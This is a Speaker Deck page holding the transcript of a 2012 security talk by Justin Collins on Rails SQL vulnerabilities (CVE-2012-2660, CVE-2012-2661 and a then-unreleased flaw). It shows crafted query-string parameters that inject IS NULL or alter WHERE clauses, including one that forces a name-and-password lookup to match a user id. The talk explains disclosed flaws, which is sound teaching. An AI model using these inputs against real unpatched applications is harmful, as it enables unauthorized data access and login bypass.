$30 off During Our Annual Pro Sale. View Details »
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
"Recent Rails SQL Issues" - 2012
Search
Justin Collins
April 23, 2015
Programming
0
62
"Recent Rails SQL Issues" - 2012
Justin Collins
April 23, 2015
Tweet
Share
More Decks by Justin Collins
See All by Justin Collins
Continuous (Application) Security at DevOps Velocity
presidentbeef
0
120
The Evolution of Rails Security
presidentbeef
1
740
Brakeman RailsConf 2017 Lightning Talk
presidentbeef
0
110
Practical Static Analysis for Continuous Application Security
presidentbeef
0
170
"...But Doesn't Rails Take Care of Security for Me?"
presidentbeef
1
370
Continuous Security with Practical Static Analysis
presidentbeef
1
270
Security Automation at Twitter - Rise of the Machines
presidentbeef
0
190
The World of Rails Security - RailsConf 2015
presidentbeef
8
1.1k
Tales from the Crypt
presidentbeef
1
190
Other Decks in Programming
See All in Programming
The Efficiency Paradox and How to Save Yourself and the World
hollycummins
1
210
Leverage LLMs in Java with LangChain4j and Quarkus
hollycummins
0
180
React CompilerとFine Grained Reactivityと宣言的UIのこれから / The next chapter of declarative UI
ssssota
7
3.4k
事業成長を爆速で進めてきたプロダクトエンジニアたちの成功談・失敗談
nealle
3
1.3k
CSC509 Lecture 13
javiergs
PRO
0
160
Remix on Hono on Cloudflare Workers
yusukebe
2
400
プロダクトの品質に コミットする / Commit to Product Quality
pekepek
1
660
Welcome JSConf.jp 2024
yosuke_furukawa
PRO
0
3k
React への依存を最小にするフロントエンド設計
takonda
21
8.8k
As an Engineers, let's build the CRM system via LINE Official Account 2.0
clonn
1
640
エンジニアとして関わる要件と仕様(公開用)
murabayashi
0
360
型のインスタンス化は非常に深く、無限である可能性があります。
kimitashoichi
0
130
Featured
See All Featured
Visualization
eitanlees
145
15k
Code Reviewing Like a Champion
maltzj
520
39k
Docker and Python
trallard
41
3.1k
The Art of Delivering Value - GDevCon NA Keynote
reverentgeek
8
1.2k
Rebuilding a faster, lazier Slack
samanthasiow
79
8.7k
Documentation Writing (for coders)
carmenintech
65
4.5k
Git: the NoSQL Database
bkeepers
PRO
427
64k
Into the Great Unknown - MozCon
thekraken
33
1.5k
実際に使うSQLの書き方 徹底解説 / pgcon21j-tutorial
soudai
169
50k
Building an army of robots
kneath
302
43k
ピンチをチャンスに:未来をつくるプロダクトロードマップ #pmconf2020
aki_iinuma
111
49k
Principles of Awesome APIs and How to Build Them.
keavy
126
17k
Transcript
Rails Vulnerabilities Last Week CVE-2012-2660 CVE-2012-2661
CVE-2012-2660 Allows unexpected “IS NULL” in queries Affects Rails 2.x
and 3.x
ActiveRecord Query unless params[:name].nil? @user = User.where(:name => params[:name]) end
Query Parameters ?name[] {"name"=>[nil]}
ActiveRecord Query unless [nil].nil? @user = User.where(:name => [nil]) end
Resulting SQL SELECT "users".* FROM "users" WHERE "users"."name" IS NULL
CVE-2012-2661 Allows some manipulation of WHERE clause via “dotted” query
keys Affects Rails 3.x
ActiveRecord Query User.where(:name => params[:name])
ActiveRecord Query User.where("users.name" => params[:name])
Query Parameters ?name[users.id]=1 {"name"=>{"users.id"=>"1"}}
ActiveRecord Query User.where(:name => {"users.id" => "1"})
Resulting SQL SELECT "users".* FROM "users" WHERE "users"." id" =
1
Unreleased Vulnerability Allows some manipulation of WHERE clause via nested
hashes in query values Affects 2.3.x and 3.x
ActiveRecord Query User.where(:name => params[:name], :password => params[:password])
Query Parameters ?name[users][id]=1&password[users][id]=1 {"name"=>{"users"=>{"id"=>"1"}}, "password" =>{"users"=>{"id"=>"1"}}}
ActiveRecord Query User.where( :name => {"users"=>{"id"=>"1"}, :password => {"users"=>{"id"=>"1"} )
Resulting SQL SELECT "users".* FROM "users" WHERE "users"." id" =
1 AND "users"."id" = 1